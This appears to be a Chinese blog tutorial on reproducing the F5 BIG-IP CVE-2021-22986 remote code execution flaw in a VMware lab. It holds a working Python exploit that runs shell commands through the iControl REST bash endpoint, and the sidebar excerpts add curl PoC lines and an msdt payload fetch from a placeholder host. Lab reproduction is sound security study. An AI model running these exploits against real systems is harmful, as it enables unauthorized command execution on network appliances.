F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

最新推荐文章于 2023-11-02 15:30:05 发布
最新推荐文章于 2023-11-02 15:30:05 发布
阅读量1.9k 收藏 1
点赞数 2
分类专栏: 漏洞分析 文章标签: python 负载均衡 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37200100/article/details/117948366
版权

一、在vmware上安装BIGIP-15.1.0

进入F5官方主页:https://support.f5.com/csp/home
点击下载按钮(如下图所示)
在这里插入图片描述
进入页面后,我们选择v15.X版本
在这里插入图片描述
选择15.1.0长期维护版本
在这里插入图片描述
在这里,我们选择虚拟化版本
在这里插入图片描述
点击我接受按钮
在这里插入图片描述
选择第一个下载
在这里插入图片描述
下载完成之后,我们将下载下来的ova文件拖动到虚拟机当中,即可完成虚拟机的安装
在这里插入图片描述

二、BIGIP虚拟机的初始使用

虚拟机登陆
虚拟机装好后 默认的用户名是 root,密码是default.
个别用户登陆后,会强制要求更换密码。这里更换的密码不能是一些常用的字符组合(比如单词)否则很容易不通过。如果您失败了几次,不妨尝试类似于f8fa7g4k3k69o这样的密码。
远程web登陆
虚拟机root登陆成功后,通过ifconfig命令获取ip地址(虚拟机要桥接模式哦),假设这里获取的ip为10.0.0.166, 那么在host主机访问这个网址,进入web配置页面
在这里插入图片描述
在这里插入图片描述
web远程登陆的用户名和密码都是admin,但是我在登陆的时候密码始终不对,最后,我只好重置这个密码(如下图,输入两遍新密码)
在这里插入图片描述
终于,在重置密码后,我web远程登陆成功了

license激活
接下来,我们点击license按钮(我这里是激活过的)
在这里插入图片描述
如果不是已激活的状态,需要进入官网:(http://www.f5.com/trial)来获取激活码
流程如图所示,选择红色框框选中的按钮
在这里插入图片描述
点击Get started按钮
在这里插入图片描述
填写你的申请信息(官网要登陆哦)
在这里插入图片描述
稍后,会在半个小时内,将激活码发送到您的邮箱里面(邮箱是官网账号注册时留的邮箱)
我们收到激活码后填写到下面的Base Registration Key栏中,然后选择Automatic模式进行激活(因为本人激活过了,所以下图是在网上找的,网上的那个人选择的是第二个,这里我实际操作选择的是第一个)
在这里插入图片描述
然后点击Next按钮,如果出现下一步或者我接受之类的按钮一律点击即可
之后一般会自动跳转到如下图所示的界面,这就代表激活成功了
在这里插入图片描述

三、远程代码执行命令

执行代码

import requests
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def attack(target_url, command="pwd"):
    command = f"\'{command}\'"
    check_url = target_url + '/mgmt/tm/util/bash'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    data = {'command': "run",'utilCmdArgs':f"-c {command}"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print(" {} 存在漏洞".format(target_url))
            attack_result = json.loads(response.text.replace('\\n', '\\t')).get('commandResult', None)
            return attack_result
        else:
            print("{} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {}'.format(target_url))


def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {}'.format(url))



if __name__ == '__main__':
    # 你的虚拟机ip地址
    ip = "your ip"
    # 执行的命令
    command = "ls"
    url = format_url(ip)
    # 输出返回结果
    print(attack(url, command))

上面的代码用户使用的时候,只需要将ip 改成您虚拟机的ip即可,其余无需改变

执行结果展示

  1. 查看当前路径
    在这里插入图片描述
  2. 查看当前路径下的文件
    在这里插入图片描述
    3.创建一个目录
    在这里插入图片描述
    到虚拟机中,我们查看目录是否创建成功

在这里插入图片描述
可以看到目录创建成功

属于我自己的光
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)
nnn2188185的博客
05-06 595
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。 可造成远程命令执行漏洞
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞
weixin_51387754的博客
11-03 407
漏洞简介 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 近日,F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行代码执行的风险声明,F5安全公告更新了BIG-IPBIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。 影响版本: F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1
网络靶场实战--BIG-IP CVE漏洞分析(CVE-2022-41622)(CVE-2022-41800)
蛇矛实验室
12-13 1292
这一小节,我们简单分析了F5设备的俩个pre-auth漏洞,了解了rpm注入和csrf漏洞产生原因。并且在此过程中我们简单学习F5设备中 soap接口和rest接口的区别以及利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
F5_BIG-IP_默认账号密码
04-28
F5_BIG-IP_默认账号密码
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
include_voidmain的博客
06-15 2247
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
qq_32660043的博客
03-22 4117
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
F5 BIG-IP iControl REST命令执行(CVE-2022-1388)
m0_46377671的博客
05-18 4588
漏洞概述 2022年5月6日,F5官方发布了BIG-IP iControl REST的风险通告,漏洞编号为CVE-2022-1388,漏洞等级为严重。F5 BIG-IP是美国F5公司的一款集成了网络流量、应用程序安全管理、负载均衡等功能的应用交付平台。iControl REST是iControl框架的演变,使用REpresentational State Transfer。这允许用户或脚本与设备之间进行轻量级、快速的交互。 组件:F5 BIG-IP iControl REST 漏洞类型:身份验证绕过 影响:
F5 BIG-IP代码执行漏洞CVE-2021-22986
m0_48520508的博客
04-01 2091
0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 0x01漏洞概述 F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 0x02影响版本 F5 BIG-IP 16.0.0-16.0.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 14.1.0-14.1.3
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-202122986-EXP:F5 BIG-IP远程代码执行cve-2021-22986,批量检测;命令执行利用
04-01
F5 BIG-IP远程命令执行突破(CVE-2021-22986) 进攻影响 F5 BIG-IP 16.x:16.1.0.3 F5 BIG-IP 15.x:15.1.0.4 F5 BIG-IP 14.x:14.1.2.6 F5 BIG-IP 13.x:13.1.3.4 F5 BIG-IP 12.x:12.1.5.2 F5 BIG-IP 11.x:...
f5_rce_poc:cve-2021-22986 f5 rce扩展批量检测poc
03-25
使用 python3 f5_rce.py -u 指定目标URL -f 批量检测文件 -c 执行命令 效果如下所示: PS:输出不够美感,我会修改的 :beaming_face_with_smiling_eyes: 问题 该POC目前只能支持部分命令,执行history , ls等失败,原因未知 后续 更新:修改部分命令执行异常情况 正则匹配,美化输出 更新其他POC利用方式 引用
CVE-2021-22986-Poc:这是BIGIP iControl取消身份验证RCE的Poc
03-25
CVE-2021-22986-Poc 这是BIGIP iControl取消身份验证RCE的Poc POC:〜 curl -ksu管理员:[已删除] -d'{“ filePath”:“ id ”}'| jq。 curl -ksu: ://192.168.123.134/mgmt/shared/authn/login -d'{“ bigipAuthCookie”:“”,“ loginReference”:{“ link”:“ '| jq。 curl -su管理员:-H“内容类型:application / json” -d'{“ command”:“ run”,“ utilCmdArgs”:“-c id“}'| jq。 参考: :
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2021-22986:CVE-2021-22986F5 BIG-IP RCE
03-25
漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 此漏洞只能通过控制平面利用,而不能通过数据平面利用。 剥削...
浏览器的常见User Agent 各字段的解释
热门推荐
quintind的专栏
11-02 1万+
浏览器的User Agent字段令人迷惑,本文解释了浏览器常见的User Agent各字段的含义
漏洞复现CVE-2023-46747 F5-BIG-IP 远程代码执行漏洞
最新发布
NicolasZQ的博客
11-02 671
漏洞复现CVE-2023-46747 F5-BIG-IP 远程代码执行漏洞
F5-BIG-IP-RCE漏洞批量检测脚本
潇湘信安的博客
09-17 174
CVE-2022-1388,该漏洞是由于iControl REST的身份验证功能存在缺陷,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行身份证绕过攻击,最终接管设备控制平台。
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)
thelostworld
03-20 3598
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986) 一、简介 该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 ​ 二、影响版本 F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1.2.6 F5 BIG-IP 13.x: 13.1.3.4 F5 BIG-IP 12.x:..
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值